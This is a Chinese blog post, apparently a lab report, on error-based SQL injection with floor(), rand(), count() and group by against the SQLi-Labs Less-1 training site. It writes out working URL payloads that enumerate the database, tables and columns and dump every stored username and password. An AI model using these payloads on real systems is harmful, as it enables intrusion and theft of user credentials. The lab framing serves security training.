SQL注入——基于报错的注入(2)

已于 2022-02-18 16:22:59 修改
阅读量799 收藏
点赞数
文章标签: sql 数据库 database
于 2022-02-18 16:22:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52072846/article/details/123004763
版权

实验目的
熟悉报错功能函数floor()的用法,掌握基于报错的SQL注入基本流程。

实验原理

(1)关于报错注入
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。
报错注入一般需要具备两个前提条件:(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。
常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
(2)关于floor()函数
在进行报错注入时,floor()函数一般需要与rand()、count()、group by联用。作用:
floor(x):对参数x向下取整;
rand():生成一个0~1之间的随机浮点数;
count(*):统计某个表下总共有多少条记录;
group by x:按照(by)一定的规则(x)进行分组;
报错原理: floor()函数与group by、rand()联用时,如果临时表中没有该主键,则在插入前会再计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中,导致主键重复报错,错误信息如: Duplicate entry '.' for key'group_key' 。
实验步骤

本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助floor()函数与rand().count()、group by的联用,利用基于报错的注入方式获取SQLi-Labs 网站的登录用户名和密码。
1..访问SQLi-Labs 网站

注:因为我把sqli-labs文件名字改为了sql,所以以下sqli-labs均以sql表示

在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQL上的SQL网站Less-1。访问的URL为:

http://[靶机IP]/sql/Less-1/
(注意大小写)

注:该实验中Firefox浏览器已经提前安装好HackBar插件,在上图的界面中右击鼠标,点击 检查 即可进入控制台,随后点击HackBar即可使用该插件 (部分机型按F12即可进入控制台)

在输入框里输好payload之后点击Execute执行

2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:

 http://[靶机IP]/sql/Less-1/?id=1'

运行报错

 http://[靶机IP]/sql/Less-1/?id=1' and '1'='1

运行正常

http://[靶机IP]/sql/Less-1/?id=1' and '1'='2

运行异常

3.获取网站当前所在数据库的库名

使用以下payload获取网站所在数据库的名字

http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat(database( ),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

结果为:security

4.获取数据库security的全部表名
使用以下payload获取数据库security的全部表名: 

http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

显示security 库中的第1张表的名字为emails。

http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

显示security 库中的第2张表的名字为referers

http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

显示security 库中的第3张表的名字为uagents

http://[靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select table_name from information_schema.tables where table_schema= 'security' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

显示security 库中的第4张表的名字为users

 以上显示结果中,第4张表users当中可能存放着网站用户的基本信息。


5.获取users表的全部字段名
使用以下 payload 获取 users表的字段名:
http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为id。

http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为username。 http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) ,concat((select column_name from information_schema.columns where table_schema= 'security' and table_name= 'users' limit 2,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) --+
显示users表中的第1个字段名字为password。

 6.获取users表id、 username和 password字段的全部值。
由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如
(1)显示第1组数据

 http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

(2)显示第2组数据

 http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

 (3)显示第3组数据

 http:/ / [靶机IP]/sql/Less-1/?id=-1' and (select 1 from (select count(*) , concat((select concat_ws( ',' ,id,username,password ) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。
实验至此结束。
实验总结
本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,熟悉
了floor()、rand()、count()、group by的用法,掌握了基于报错的注入方法和流程。

江月未来
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
floor()报错注入
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
SQL注入—基于报错注入
Snowflake1997的博客
02-18 1074
SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找.
SQL报错注入
qq_64332865的博客
02-18 562
基于报错注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL注入之基于报错注入
weixin_68951704的博客
07-05 827
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
WEB安全基础 - - -SQL注入利用
weixin_67503304的博客
07-13 988
以web安全中的SQL语句为了,以sqli-labs的Less-1为例子,详细解释了SQL语句的利用。
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入:基于报错SQL注入
weixin_73180072的博客
12-04 253
基于报错SQL注入
网络安全——SQL报错注入
weixin_54055099的博客
09-14 1912
SQL注入报错注入
Floor报错注入原理解析心得
qq_27130557的博客
10-22 2832
相关函数 1.floor() 向下取整。 即取不大于x的最大整数。取按照数轴上最接近要求值的左边值。 2.rand(x) 随机产生一个0-1之间的浮点数 当指定参数x之后,会生成固定的伪随机序列。即固定了参数,之后每次生成的值都是一样的,故称之为固定的伪随机数字(产生的数字都是可预知的) rand(0)*2 产生一个伪随机序列(结果已知),因为*2,所以返回结果只能是0或1 3.count(*) 返回值的条目,与count()的区别在于其不排除NULL,c..
get基于报错sql注入
冷巷(✘_✘)的博客
07-14 1049
目录1.SQL注入的分类数字型字符型2.get基于报错sql注入发现3.get基于报错sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如 字符型 例如 2.get基于报错sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
SQL注入方法-报错注入
acepanhuan的博客
02-11 954
SQL注入方法-报错注入
sql注入(6)报错注入
c10udz的博客
05-11 4751
利用hackbar进行sql注入简单实例
Ro_kin的博客
07-16 1万+
这个简单的实例是对一个网址进行sql注入,获得管理员的账号和密码目标网址:http://www.xxx/news_detail.php?id=186步骤如下: (1)先猜解当前网页的字段数 在hackbar的输入框中输入: http://www.xxx/news_detail.php?id=186 order by 7 页面显示正常,输入 http://www.xxx/news_deta
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 2万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
MySQL数据库注入
security.blog.cndn.net
03-07 251
sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限 例: sqlmap.py -u “http://www.xx.com/show.php?id=81” --is-dba sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户 例: sqlmap.py -u “http://www.x...
SQL注入中的报错注入
最新发布
04-05
报错注入是一种利用SQL语句执行错误返回的方式来获取数据库信息的攻击手段。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而获得敏感信息或者执行非法操作。 报错注入的原理是利用数据库系统在执行SQL语句时,如果出现错误会返回错误信息的特性。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而返回错误信息。错误信息中可能包含有关数据库结构、表、列名、数据类型等敏感信息,攻击者可以根据这些信息进一步进行攻击。例如,攻击者可以通过报错注入获取管理员账户的密码,从而登录管理员账户并执行非法操作。 防范报错注入的方法包括: 1. 对用户输入的数据进行过滤和验证,确保输入数据的合法性和安全性。 2. 使用参数化查询或预编译语句,避免将用户输入的数据直接拼接到SQL语句中,从而避免SQL注入攻击。 3. 禁用或限制数据库系统返回错误信息的功能,从而避免敏感信息被攻击者获取。 4. 更新和维护数据库系统,及时修复已知的漏洞和安全问题,提高数据库系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值